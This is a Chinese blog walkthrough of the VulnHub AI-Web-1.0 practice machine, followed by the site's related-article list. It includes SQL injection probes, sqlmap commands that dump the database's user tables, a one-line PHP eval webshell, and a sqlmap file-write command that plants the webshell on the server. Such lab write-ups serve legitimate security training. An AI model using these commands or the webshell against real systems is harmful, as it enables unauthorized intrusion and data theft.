AI-WEB-1.0 靶机

于 2024-07-29 16:36:17 发布
阅读量174 收藏 3
点赞数 5
文章标签: 服务器 数据库 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140774662
版权

AI-WEB-1.0

一、安装靶机环境

下载地址:
https://www.vulnhub.com/entry/ai-web-1,353/
下载压缩文件打开
image-20240729143948310

image-20240729145641048

开启虚拟机

二、信息收集

1.查看NAT模式IP段

image-20240729145846003

编辑–>虚拟网络编辑器

image-20240729145748137

御剑2014查IP

image-20240729150141135

访问网站

image-20240729150203131

御剑目录扫描

image-20240729150447652

访问robots.txt

image-20240729150533103

访问一下这些目录都禁止访问

image-20240729150812202

用御剑对这两目录扫描

image-20240729151127696

image-20240729151354711

在info.php中能看出

Linux系统
根目录:/home/www/html/web1x443290o2sdf92213
用户:webmaster@localhost

image-20240729153411162

在这个页面看到搜索框可以尝试注入了

image-20240729151559278

三、渗透

1.尝试SQL注入

判断是否有SQL注入

在输入框输入

1' //有报错信息
-1//无结果
1//有结果

image-20240729151925151

image-20240729152128318

用sqlmap注入

抓包设置注入点保存到1.txt

image-20240729152326187

(1)查库

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch --current-db

image-20240729152440519

库为:aiweb1

(2)查表

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D aiweb1 --tables

image-20240729152557064

(3)查user数据

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D aiweb1 -T user --dump

image-20240729152632015

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D aiweb1 -T systemUser --dump

image-20240729152846478

不过好像没有登录的地方也没有文件上传的地方。

2.通过sqlmap写入文件

shell.php

<?php @eval ($_POST['cmd']); ?>

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --file-write C:\Users\1\Desktop\shell.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

image-20240729160240321

能访问证明写入成功

image-20240729160340232

用蚁剑

image-20240729160410682

连接成功

黑白时光les
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6238
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4159
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Ai-web-1.0靶机中的骚操作
weixin_51692662的博客
11-05 336
sqlmap、反弹shell、passwd提权、Ai-web-1.0
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 960
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2468
AI-WEB-1.0靶机的简单攻略
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1371
vulnhub靶机AI-Web-1.0渗透笔记
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1398
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
vulnhub靶机AI-Web-1.0小白渗透学习笔记
qq_45885854的博客
06-12 295
vulnhub靶机AI-Web-1.0小白基础渗透学习,主要学习渗透思维,常见工具的使用sqlmap、dirb、python提权,修改用户名等
AI-Web-1.0靶场
qq_46187131的博客
03-27 1287
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
linux ftp操作记录
m0_74318255的博客
07-24 235
你需要首先确认FTP用户是否是系统用户,还是FTP服务器软件(如Pure-FTPd)使用虚拟用户。如果你的FTP服务器使用系统用户,那么你需要先创建该用户。的错误,这意味着系统中不存在名为。这将创建一个新的系统用户。
初创小程序公司怎么选服务器合作商
最新发布
qq177803623的博客
07-25 482
同时,稳定性是衡量服务器性能的重要指标,一个频繁出现宕机、访问延迟的服务商,无疑会给企业的品牌形象和业务运营带来巨大损失。在移动互联网的浪潮中,小程序以其轻量、便捷、即用即走的特点,成为了众多初创企业快速触达用户、展现创意与服务的理想平台。一个优秀的服务器服务商,不仅仅提供基础的计算资源,更应当构建完善的生态系统,提供包括数据库、缓存、安全、监控等在内的全方位解决方案。通过前期的咨询、合作过程中的问题反馈以及售后服务的体验,可以初步判断服务商的服务质量和态度,为未来的合作奠定良好的基础。
Linux - 进程间通信
weixin_64099089的博客
07-25 795
进程间通信的方式
python自动化运维 通过paramiko库和time库实现服务器自动化管理
pymzy666skr的博客
07-25 752
在数字化时代,IT 基础设施的规模和复杂性不断增长,传统的手动管理方法已不再适用。自动化运维,作为 IT 运维管理的新范式,正变得越来越重要。它不仅能够显著提升运维效率,降低人为错误,还能确保业务连续性和系统的高可用性。Python,以其简洁的语法和强大的功能,成为自动化运维的优选语言。借助 Python,我们可以快速开发出灵活且强大的自动化脚本,以应对各种运维场景。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值